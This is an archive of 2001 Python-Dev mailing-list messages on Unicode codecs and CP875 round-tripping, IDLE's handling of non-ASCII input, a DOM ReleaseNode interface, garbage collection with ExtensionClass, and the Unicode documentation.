> Are all the codecs ditributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.

I am thinking of these use cases:

"���".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (dito)
"���".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Sun May 13 18:20:01 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statment
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here, is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Sun May 13 18:40:58 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='��'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From Mike.Olson@fourthought.com  Sun May 13 19:15:46 2001
From: Mike.Olson@fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, that or came up with a
standard interface on the node.  Then, every DOM imp that wants to be
compatible with xpath/xslt needs to support this interface?


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite@lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson@fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one@home.com  Sun May 13 19:31:42 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.


From martin@loewis.home.cs.tu-berlin.de  Sun May 13 20:08:47 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
 Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, that or came up with a
> standard interface on the node.  Then, every DOM imp that wants to be
> compatible with xpath/xslt needs to support this interface?
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?

Regards,
Martin


From tim.one@home.com  Sun May 13 20:45:40 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?


From tim.one@home.com  Sun May 13 21:54:50 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

]/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one@home.com  Sun May 13 22:00:32 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip@pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido@digicool.com  Sun May 13 23:26:39 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but may be I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:37:44 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
 <Pine.NXT.4.21.0105121640050.261-100000@localhost>
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost>
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking it's nose in under the tent.) 
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical quesion, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClassess (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:43:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
 <00ca01c0da68$4fc66570$e46940d5@hagrid>
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
 <00ca01c0da68$4fc66570$e46940d5@hagrid>
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in october, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sun May 13 23:51:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
 <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='��'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='��'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson@fourthought.com  Mon May 14 02:02:03 2001
From: Mike.Olson@fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, that or came up with a
> > standard interface on the node.  Then, every DOM imp that wants to be
> > compatible with xpath/xslt needs to support this interface?
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant
mike.olson@fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From MarkH@ActiveState.com  Mon May 14 02:37:35 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the
medium
>   term, altough the default encoding for that platform will be other than
>   'mbcs'.
>   On operating system that support non-ascii filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before
passing
>   it back to the Operating System would result in a Unicode error, as
Python
>   would attempt to use it's default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this
context.
>   See [????] for more details, including examples.


From tim.one@home.com  Mon May 14 03:52:22 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far is it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encdoing" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry@digicool.com  Mon May 14 05:16:18 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
 <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik@pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr@thyrsus.com  Mon May 14 06:20:17 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few tings:

1. Somebody seems to have removed Andrew Kuchling's namne from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg@cosc.canterbury.ac.nz  Mon May 14 06:36:49 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack@oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design.

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.

>From the user's point of view, the closest thing to a
"current directory" is the way the standard file dialogs
remember which directory you were browsing in last.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 06:38:24 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
 Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal@lemburg.com  Mon May 14 10:02:19 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

